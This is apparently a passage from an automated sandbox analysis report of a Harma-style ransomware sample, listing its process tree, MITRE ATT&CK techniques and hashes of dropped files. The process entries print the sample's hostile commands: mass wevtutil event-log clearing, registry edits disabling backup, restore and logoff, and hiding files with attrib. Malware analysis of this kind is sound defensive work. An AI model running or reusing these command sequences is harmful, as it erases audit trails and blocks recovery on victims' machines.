1⤵
- Clears Windows event logs
PID:1088

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
1⤵
PID:4080

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
1⤵
PID:2400

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
1⤵
PID:2648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
1⤵
PID:2260

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
1⤵
PID:100

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
1⤵
PID:2440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Operational"
1⤵
PID:2680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Admin"
1⤵
PID:952

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
1⤵
PID:2748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationSrcPrefetch"
1⤵
PID:3736

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
1⤵
PID:2256

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformanceCore"
1⤵
PID:1668

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
1⤵
PID:1872

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationContentProtection"
1⤵
PID:3832

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
1⤵
PID:920

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:4692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationAsyncWrapper"
1⤵
PID:5020

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:2976

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProcD3D"
1⤵
PID:2976

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProc"
1⤵
PID:1292

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationFrameServer"
1⤵
PID:3120

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
1⤵
PID:1396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
1⤵
PID:2844

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
1⤵
PID:4388

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:4104

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
1⤵
PID:4616

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Key Management Service"
1⤵
PID:4668

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:3568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
1⤵
PID:844

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
1⤵
PID:4576

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
1⤵
PID:3440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
1⤵
PID:3424

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
1⤵
PID:1420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
1⤵
- Clears Windows event logs
PID:1332

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "General Logging"
1⤵
PID:396

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:2796

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
1⤵
PID:2796

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
1⤵
PID:1112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
1⤵
PID:4060

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:3640

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
1⤵
PID:2040

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4392

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Application"
1⤵
PID:4392

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "AirSpaceChannel"
1⤵
PID:4556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "AMSI/Debug"
1⤵
- Clears Windows event logs
PID:928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
1⤵
PID:1188

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
1⤵
PID:5060

C:\Windows\SysWOW64\attrib.exe
attrib +h +s C:\ProgramData\HRMPUB
1⤵
- Suspicious use of AdjustPrivilegeToken
- Views/modifies file attributes
PID:3184

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Indicator Removal

2

T1070

File Deletion

1

T1070.004

File and Directory Permissions Modification

1

T1222

Hide Artifacts

1

T1564

Hidden Files and Directories

1

T1564.001

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\HRMPRIV
Filesize
2KB

MD5
5a578a1d64ee8a47cd1fcb54e349e054

SHA1
cf06a6214bc3bc838319ceb8d97ce4873ee5eb29

SHA256
4f03b23c3262da7df82128161990389ba2d6f74102a76162b92f075191553cf2

SHA512
dc765a66377d373b120302a9e1025857f5f441dc0eef143865d72c50a77c52b68d2d2fa95560a69841d07f35b625576fce3801cbde839db70a2a364f4968a87f

Download Submit
C:\ProgramData\harma.exe
Filesize
913KB

MD5
30e1234ef3e570667526fdb006832b12

SHA1
01de8ba945945b58824f69553ac0f7b048645d45

SHA256
72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2

SHA512
00bd673f43cba1b16363433e672b30d22196fa0b67c024f970da15270323e545d15b3b990ed1dbbc3e7b9421c3f7840b10621c76203f89e0bcb1214e2a129e4e

Download Submit
C:\ProgramData\id.harma
Filesize
8B

MD5
d52a34c75dadc241395c9589964794fe

SHA1
3afcc9640e49ed00fedf026beb065685741af5b3

SHA256
24a5c1ebaf6bbabb24a44ac416e1dcb6364168c53a63ef725011e67b004c3e92

SHA512
224cf2db348e54d303eaa7f52f9175fdc41da612491f573ea5f3cd43a3f40c198111fe525f32bd95ae0b556cb9cfccf93d54b81651166a5c60033f1a06a5bf55

Download Submit
C:\Users\Admin\AppData\Local\Temp\HRMPUB
Filesize
292B

MD5
67a2f94926e5ae08b5362dd3d7a6abe3

SHA1
a7a343b3232493dd90e1f727454cc3fea121a154

SHA256
05ac2137b115519ae95675c42b107b18579a139e253a2540d9b80528fb023ffa

SHA512
6d886797935e125fa60e7fc63930b55bbe840cf6999c6ba6a57e0c9416f05a39b82d5f464ec0ba0ad2663bb3df80c74ace37ce8d3f99aa66c153540bcafbc905

Download Submit
memory/544-7983-0x0000000076442000-0x0000000076443000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads